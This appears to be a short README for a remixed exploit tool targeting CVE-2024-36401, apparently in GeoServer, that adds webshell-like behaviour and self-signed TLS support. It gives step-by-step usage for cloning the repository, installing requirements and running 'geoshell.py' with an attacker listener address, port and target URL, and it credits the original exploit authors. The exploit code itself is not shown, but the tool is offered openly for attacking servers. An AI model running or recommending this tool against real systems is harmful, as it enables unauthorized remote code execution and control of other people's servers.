
Remix of Chokapikk's CVE-2024-36401 to allow webshell-like behaviour on limited environments
Remix of Chokapikk's CVE-2024-36401 to allow webshell-like behaviour on limited environments. Also allows for self-signed TLS sessions as HTTP sessions are a bit...
Usage:
git clone https://github.com/keelanbrady1011/CVE-2024-36401 && cd CVE-2024-36401
pip install -r requirements.txt
python3 geoshell.py --lhost OWN_IP --lport PORT --url http://TARGET/ --ssl
https://github.com/Chocapikk/CVE-2024-36401
Original exploit code was created by: Chocapikk K3ysTr0K3R